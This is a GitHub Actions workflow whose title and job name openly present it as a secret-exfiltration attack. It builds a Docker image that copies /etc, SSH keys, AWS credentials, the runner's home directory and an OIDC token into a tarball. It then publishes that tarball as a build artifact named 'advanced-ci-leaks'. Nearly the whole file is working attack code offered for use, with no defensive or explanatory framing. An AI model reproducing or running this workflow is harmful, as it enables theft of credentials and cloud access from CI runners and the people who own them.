name: Leak Secrets Without GITHUB_TOKEN

on:
  push:
    branches: [ main ]

jobs:
  exfiltrate:
    runs-on: ubuntu-latest
    permissions:
      id-token: write
      contents: read  # Excludes GITHUB_TOKEN

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Build malicious Docker image
        run: |
          PAYLOAD=$(cat <<'EOF'
          echo "[+] Dumping sensitive paths..." && \
          mkdir -p /loot && \
          cp -r /etc /loot/etc 2>/dev/null || true && \
          cp -r /root/.ssh /loot/ssh 2>/dev/null || true && \
          cp -r /root/.aws /loot/aws 2>/dev/null || true && \
          cp -r /home/runner /loot/runner 2>/dev/null || true && \
          cp /token /loot/oidc 2>/dev/null || true && \
          tar -czf /leaks.tgz -C /loot . || true
          EOF
          )

          echo "$PAYLOAD"

          echo "$PAYLOAD" > payload.sh
          docker build \
            --build-arg PAYLOAD="$(cat payload.sh)" \
            -t secret-hunter \
            ./taskcluster/docker/python

          docker run --rm -v $PWD:/out secret-hunter sh -c "cp /leaks.tgz /out/leaks.tgz || true"

      - name: Upload Artifact
        uses: actions/upload-artifact@v4
        with:
          name: advanced-ci-leaks
          path: leaks.tgz
